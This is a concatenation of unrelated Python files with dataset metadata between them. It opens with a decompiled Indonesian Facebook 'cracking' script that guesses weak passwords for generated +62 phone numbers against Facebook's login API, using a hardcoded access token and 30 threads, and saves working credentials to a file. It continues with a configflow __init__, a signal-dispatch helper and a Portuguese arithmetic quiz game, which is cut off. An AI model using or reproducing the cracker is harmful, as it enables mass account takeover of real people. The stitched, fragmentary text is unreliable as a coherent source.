'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;93mPlease Wait \x1b[1;93m' + o,
sys.stdout.flush()
time.sleep(1)
logo = '\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x80\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x91\xe2\x96\x92\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x8c\n\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x90\xe2\x96\x88\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92\xe2\x96\x88\xe2\x96\x8c\n\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x94\x80\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x92\xe2\x96\x90\xe2\x96\x84\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x91\xe2\x96\x90\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x8c\n\n Author : Tegar ID\n Youtube : Dunia Kode\n\n DUNIA KODE COMUNITY\n\n'
back = 0
oks = []
id = []
cpb = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
os.system('clear')
jalan('\x1b[3;45;91mCoding Is Fun, I Always Happy With Code \x1b[1;0m')
jalan(' \x1b[1;96m HALLO WELCOME TO TOOLS DUNIA KODE \x1b[1;0m')
jalan('=====================================')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x88\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x90\xe2\x94\xbc\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x90\xe2\x94\xbc\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x90\xe2\x96\x84\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x96\x90\xe2\x96\x90\xe2\x96\x80\xe2\x96\x88\xe2\x94\x80\xe2\x96\x88\xe2\x94\x80\xe2\x96\x8c\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x96\x90\xe2\x94\x80\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x90\xe2\x96\x8c\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x90\xe2\x96\x80\xe2\x96\x90\xe2\x96\x92\xe2\x96\x8c\xe2\x96\x80\xe2\x96\x88\xe2\x96\x80\xe2\x96\x92\xe2\x96\x90\xe2\x96\x92\xe2\x96\x88\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x90\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x8c\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan('\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92\xe2\x96\x92')
jalan(' \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88')
jalan('MASUKIN PASSWORD NYA')
jalan('CREATED BY TEGAR ID')
jalan('===================================')
CorrectPasscode = 'tegarid'
loop = 'true'
while loop == 'true':
passcode = raw_input('[?] PASSWORD : ')
if passcode == CorrectPasscode:
print '\n CORRECT\n '
loop = 'false'
else:
print 'WRONG'
os.system('xdg-open https://www.youtube.com/channel/UCtw4FMEyTYYll2RyQl6y28w')
def lisensi():
login()
def login():
print '[1] Mulai cloning ( tanpa login )'
time.sleep(0.05)
print '[0] Keluar'
pilih_login()
def pilih_login():
peak = raw_input('\nPILIH : ')
if peak == '':
print '[!] Isi Yang Bener Cuk'
pilih_login()
elif peak == '1':
Zeek()
def Zeek():
print 'Pilih Lagi Biar Pasti'
print '[1] Mulai Cracking'
time.sleep(0.05)
print '[0] Kembali'
time.sleep(0.05)
action()
def action():
global cpb
global oks
peak = raw_input('\nPILIH : ')
if peak == '':
print '[!] Isi Yang Bener Cuk'
action()
elif peak == '1':
os.system('clear')
print logo
print 'Masukin Kode Kartu Indonesia Misal (Tri = 95)' + '\n'
print 'Kode Kartu Yg Tersedia : 12,21,95,96,97,,56,57,58'
try:
c = raw_input('PILIH : ')
k = '+62'
idlist = '.txt'
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except IOError:
print '[!] File Tidak Ditemukan'
raw_input('\n[ Kembali ]')
blackmafiax()
elif peak == '0':
login()
else:
print '[!] Isi Yang Bener Cuk'
action()
print 50 * '='
xxx = str(len(id))
jalan(' Total id Ditemukan : ' + xxx)
jalan(' Code yang lu pilih : ' + c)
jalan(' Tunggu Lagi Mulai Proses Cracking...')
jalan(' Untuk Stop Nya Tekan Ctrl+z')
print 50 * '='
def main(arg):
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\xe2\x94\x82 [Berhasil] ' + k + c + user + ' ' + pass1 + ' \xe2\x94\x82'
okb = open('save/cloned.txt', 'a')
okb.write(k + c + user + pass1 + '\n')
okb.close()
oks.append(c + user + pass1)
elif 'www.facebook.com' in q['error_msg']:
print '\xe2\x94\x82 [Cekpoint] ' + k + c + user + ' | ' + pass1 + ' \xe2\x94\x82'
cps = open('save/cloned.txt', 'a')
cps.write(k + c + user + pass1 + '\n')
cps.close()
cpb.append(c + user + pass1)
else:
pass2 = 'sayang'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\xe2\x94\x82 [Berhasil] ' + k + c + user + ' | ' + pass2 + ' \xe2\x94\x82'
okb = open('save/cloned.txt', 'a')
okb.write(k + c + user + pass2 + '\n')
okb.close()
oks.append(c + user + pass2)
elif 'www.facebook.com' in q['error_msg']:
print '\xe2\x94\x82 [Cekpoint] ' + k + c + user + ' | ' + pass2 + ' \xe2\x94\x82'
cps = open('save/cloned.txt', 'a')
cps.write(k + c + user + pass2 + '\n')
cps.close()
cpb.append(c + user + pass2)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '='
print 'Proses Cracking Sudah Selesai ...'
print 'Total Berhasil/Cekpoint : ' + str(len(oks)) + '/' + str(len(cpb))
print 'Hasil Crack Di Simpan di : save/cloned.txt'
jalan('Catatan : Akun Yang Kena Cp Tunggu Aja 10 Sampe 20 Hari Biar Pulih Lagi')
print ''
raw_input('\nKembali')
login()
if __name__ == '__main__':
login()
# okay decompiling patched.pyc
| 56.888
| 2,007
| 0.641471
| 2,630
| 14,222
| 3.453612
| 0.138783
| 0.346802
| 0.199163
| 0.26423
| 0.709017
| 0.703622
| 0.686007
| 0.672905
| 0.660685
| 0.656061
| 0
| 0.257692
| 0.147588
| 14,222
| 249
| 2,008
| 57.116466
| 0.491545
| 0.022008
| 0
| 0.305825
| 0
| 0.116505
| 0.65712
| 0.513276
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.11165
| 0.043689
| null | null | 0.135922
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 12
|
d93de5a9d4c4667841246e036fdb3d427311e6f4
| 153
|
py
|
Python
|
src/configflow/exceptions/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 8
|
2022-01-25T09:06:34.000Z
|
2022-03-28T14:55:45.000Z
|
src/configflow/exceptions/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 23
|
2022-01-23T15:15:00.000Z
|
2022-03-28T21:47:15.000Z
|
src/configflow/exceptions/__init__.py
|
volodymyrPivoshenko/configflow
|
2158c8395c4913b836c2a27e38c51f5ec519323b
|
[
"MIT"
] | 1
|
2022-03-15T21:08:19.000Z
|
2022-03-15T21:08:19.000Z
|
"""Package for the exceptions."""
from configflow.exceptions import io
from configflow.exceptions import misc
from configflow.exceptions import sources
| 25.5
| 41
| 0.823529
| 19
| 153
| 6.631579
| 0.526316
| 0.333333
| 0.571429
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 153
| 5
| 42
| 30.6
| 0.926471
| 0.176471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
d9441c37de378d1d7fbce4db995fcac8d52dad63
| 242
|
py
|
Python
|
hermes/forms/tasks.py
|
NiekKeijzer/hermes
|
48c2e015ab5b299dbbc488a8934af76cabf144cb
|
[
"MIT"
] | null | null | null |
hermes/forms/tasks.py
|
NiekKeijzer/hermes
|
48c2e015ab5b299dbbc488a8934af76cabf144cb
|
[
"MIT"
] | null | null | null |
hermes/forms/tasks.py
|
NiekKeijzer/hermes
|
48c2e015ab5b299dbbc488a8934af76cabf144cb
|
[
"MIT"
] | null | null | null |
from hermes.forms.models import Submission
from .signals import submission_received
def dispatch_submission_received(submission: Submission) -> None:
submission_received.send_robust(dispatch_submission_received, submission=submission)
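# Illustrative sketch (not part of the original module): send_robust() delivers
# the signal to every connected receiver and swallows exceptions raised inside
# them. Assuming submission_received is a Django-style Signal, a hypothetical
# receiver could be registered like this:
def notify_on_submission(sender, submission: Submission = None, **kwargs) -> None:
    """Hypothetical receiver reacting to a newly received submission."""
    print(f"New submission received: {submission!r}")


submission_received.connect(notify_on_submission)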
| 30.25
| 88
| 0.85124
| 27
| 242
| 7.37037
| 0.481481
| 0.361809
| 0.261307
| 0.361809
| 0.462312
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 242
| 7
| 89
| 34.571429
| 0.904545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d949505c7f3d2515f4ac98c37564e531c21eb3bb
| 21,319
|
py
|
Python
|
Funcoes.py
|
Wesley-Breno/Calculator
|
3f2c254177d5db155bdfeb32c5ef620523a94eb2
|
[
"MIT"
] | 3
|
2021-06-25T04:06:14.000Z
|
2021-07-29T20:05:09.000Z
|
Funcoes.py
|
Wesley-Breno/Calculator
|
3f2c254177d5db155bdfeb32c5ef620523a94eb2
|
[
"MIT"
] | null | null | null |
Funcoes.py
|
Wesley-Breno/Calculator
|
3f2c254177d5db155bdfeb32c5ef620523a94eb2
|
[
"MIT"
] | null | null | null |
from random import randint
def titulo_inicial():
"""
Writes the title of the game... "Calculator".
:return: None
"""
print()
print('\033[;1m⟶-⟷-⟵' * 10)
print(f'{"Calculator":^50}')
print('⟶-⟷-⟵' * 10)
print('\033[m')
def pular(c=1):
"""
Used to print blank lines.
:param c:
How many blank lines the function will print.
:return: None
"""
cont = 0
while cont != c:
print()
cont += 1
def press_enter(c=0, msg='continuar'):
"""
Shows a message asking the user to press Enter
to continue running the program.
:param c:
Chooses the colour in which the word Enter appears...
c = 0
bold
c = 1
red + bold
c = 2
purple + bold
c = 3
blue + bold
:param msg:
Keeps 'continuar' or replaces it with another word.
Ex:
"Press Enter to continue/exit."
:return: None
"""
if c == 0:
# Bold
print()
print('__' * 16)
input(f'Pressione \033[;1mEnter\033[m para {msg}.')
elif c == 1:
# Red
print()
print('__' * 16)
input(f'Pressione \033[1;31mEnter\033[m para {msg}.')
elif c == 2:
# Purple
print()
print('__' * 16)
input(f'Pressione \033[35;1mEnter\033[m para {msg}.')
elif c == 3:
# Blue
print()
print('__' * 16)
input(f'Pressione \033[34;1mEnter\033[m para {msg}.')
def erro(msg='padrao'):
"""
Displays an error message on the screen.
:param msg:
Custom message... for when a specific
error needs to be reported.
:return: None
"""
if msg != 'padrao':
pular(3)
print('__' * 16)
print(f'[\033[1;31mERROR\033[m]\n{msg}')
press_enter(c=1)
else:
pular(3)
print('__' * 16)
print('[\033[1;31mERROR\033[m]\nParece que houve um erro\nTente novamente.')
press_enter(c=1)
def calculo(simbolo_matematico, dificuldade):
"""
Shows the exercise according to the chosen difficulty
and mathematical operation.
:param simbolo_matematico:
Chooses the mathematical operation
EX:
1 -> Addition
2 -> Subtraction
3 -> Multiplication
4 -> Division
:param dificuldade:
Chooses the difficulty
EX:
1 -> Easy (1 to 100)
2 -> Normal (20 to 150)
3 -> Hard (100 to 500)
4 -> Challenge me (1000 to 3000)
:return: None
"""
if simbolo_matematico == 1: # Addition
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1, 100) # Easy difficulty: 1 to 100
n2 = randint(1, 100)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150) # Normal difficulty: 20 to 150
n2 = randint(20, 150)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(100, 500) # Hard difficulty: 100 to 500
n2 = randint(100, 500)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000) # "Challenge me" difficulty: 1000 to 3000
n2 = randint(1000, 3000)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} + {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
else:
if type(resultado) == int:
if resultado == n1 + n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 + n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da soma\033[m')
elif simbolo_matematico == 2: # Subtraction
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1, 100) # Easy difficulty: 1 to 100
n2 = randint(1, 100)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150)
n2 = randint(20, 150)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(100, 500)
n2 = randint(100, 500)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000)
n2 = randint(1000, 3000)
if n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} - {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
else:
if type(resultado) == int:
if resultado == n1 - n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 - n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da subtracao\033[m')
elif simbolo_matematico == 3: # Multiplication
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1, 100)
n2 = randint(1, 100)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150)
n2 = randint(20, 150)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
